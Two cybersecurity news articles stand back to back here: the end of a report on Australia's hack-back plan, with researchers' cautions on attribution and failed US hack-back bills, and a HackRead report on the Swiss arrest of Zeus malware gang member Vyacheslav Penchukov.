Such efforts have resulted in numerous infrastructure takedowns and arrests, indictments and convictions of cybercrime gang members and leaders over the years. Even major U.S. technology companies — often acting under the authority of court orders — have participated in these efforts: Examples include Microsoft's participation in the takedown of the Zloader botnet operation and its more recent disruption of the Seaborgium phishing operation out of Russia.

"Cybercriminal groups, despite the level of impunity they often operate under, are vulnerable to disruption," says Casey Ellis, founder and CTO of Bugcrowd. "In my opinion this makes proactive hunting a viable pursuit," he says, pointing to examples like law enforcement's takedown of the Conti and REvil group operations.

Since the sort of activity that the Australian government announced has been going on for quite some time now, Ellis says the recent announcement represents a doubling down on those efforts, designed to send a signal.

"Cybercriminal groups are far less effective when they distrust each other or feel as though they are actively targeted," Ellis says.

US lawmakers have on a few occasions attempted — and failed — to pass bills that would offer some legal backing for organizations that hack back against cyberattackers. One notable example was H.R. 4036, the Active Cyber Defense Certainty Act (ACDC) of 2017, which would have allowed hacking back as a defense measure on an organization's own network under certain circumstances.

Another bill in 2021, titled "Study on Cyber-Attack Response Options Act," would have required the US Department of Homeland Security to assess the benefits and consequences of amending the nation's current computer abuse law to provide provisions for hacking back at attackers.

The initiatives failed amid controversy, largely around concerns that innocent entities could be caught in the crossfire.

**The Need for Caution**

Security researchers too have long advocated the need for caution around proactive efforts to disrupt criminal infrastructure — or to hack back against operators — because of the difficulties around attribution and collateral damage.

Innocent organizations, for instance, can get disrupted from the takedown of a hosting provider that a threat actor might have used to launch attacks. The ability for threat actors to launch attacks that appear to originate from somewhere else is another reason why critics have noted hack-back initiatives are dangerous.

"In general, truly attributing an attack is quite difficult," says Erick Galinkin, principal researcher at Rapid7, a company that has been a staunch critic of hack-back bills such as ACDC. "Attribution may be one of the hardest problems in all of cybersecurity."

There are a number of reasons for this, but among the main ones is that attackers are happy to use victims to target other victims. This means that when a victim hacks back, they may in fact be targeting another victim rather than an attacker, he says. "Moreover, allowing private sector hack back is incredibly challenging from an oversight and accountability perspective — how could a determination be made about who took the first offensive action?" he asks.

There are also potential legal landmines to consider. A law that Georgia's state legislature passed in 2018 — but which the Governor later vetoed — contained a provision that in essence would have protected a company against legal liability if it conducted a hack-back operation against another entity so long as it was part of "active defense."

As Rapid7 has noted, the term "active defense" as used in the bill could have been interpreted in any number of ways, leading to potential misuse and unintended consequences. "Here is a hypothetical: Remotely breaking into and searching another person's computers to see if that person possesses stolen passwords that could potentially be used for unauthorized access," the company said.

The main con is that you don't want to get it wrong, especially when operating under government authority, Ellis from Bugcrowd agrees. "This type of activity certainly has the potential to escalate into an international incident," he says. "The upside is the opportunity to use the cyberattacker's advantage against them, thereby leveling the playing field a little better."

Nonetheless, there could be a growing appetite for such measures, Galinkin says, as the Australian bill shows. "Calls for bills such as the Active Cyber Defense Certainty Act and others may increase given the current cyber threat environment, but we as practitioners have a responsibility to continue to inform policymakers about the risks associated with allowing such activities."

Australia's Hack-Back Plan Against Cyberattackers Raises Familiar Concerns

By Waqas
The suspect, Vyacheslav Igorevich Penchukov, was wanted by the FBI since August 2012.
This is a post from HackRead.com Read the original post: Ukrainian behind global Zeus malware operation finally caught

As per security journalist Brian Krebs, a Ukrainian national identified as Vyacheslav Igorevich Penchukov has been arrested by Swiss law enforcement agencies. The suspect was nabbed for his involvement in cybercrime especially the infamous Zeus malware.

The suspect used the nickname Tank and Father. He was arrested on 23 October 2022 from Geneva and is awaiting extradition to the USA, reported Krebs.

**About Zeus**

For your information, Zeus is a banking trojan created by an unknown individual known by the handle lucky12345. The devices infected by this highly adaptable malware can be included in an army of a botnet to launch distributed denial of service attacks (DDoS attacks).

The FBI wanted Penchukov on cybercrime charges for more than a decade. He was a member of one of the most notorious cybercrime gangs dubbed JabberZeus. In their malicious campaigns, the cybercriminals stole over $70 million from innocent victims’ bank accounts. 

The gang, which the US Department of Justice referred to as a wide-ranging racketeering enterprise, used Zeus malware for their operations. Reportedly, Penchukov was in a western Ukrainian city called Uzhgorod before Russia invaded the country. He traveled with fake identification details and was in Geneva at the time of his arrest, where he came to meet his wife.

It is worth noting that the suspect was charged in Nebraska back in August 2012 along with Ivan Viktorovich Klepikov, known by the nick “nowhere” and “petrovich,” and Alexey Dmitrievich Bron, also known as “thehead.” 

**Details of Charges**

In 2014, the US Department of Justice released court documents that revealed Penchukov worked with eight gang members. Together they infected countless business computers with Zeus malware to steal account numbers, passwords, and other sensitive data to hack bank accounts and siphon funds from the victims’ accounts.

They were charged for their role in a botnet-based campaign in which they collected targeted users’ bank account login credentials using Zeus malware and drained funds from their accounts. The gang sent the money outside the USA via an extensive network of money mules.

1.  Arrested: 4 hackers involved in SIM Swap, malware attacks
2.  ATM hacker behind $1 billion malware heists arrested in Spain
3.  Japanese boy arrested for developing crypto-stealing malware
4.  Hacker gets 14 years jail over Scan4You malware scanning service
5.  Malware service operators arrested; offered antivirus bypassing tools

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Tag

#botnet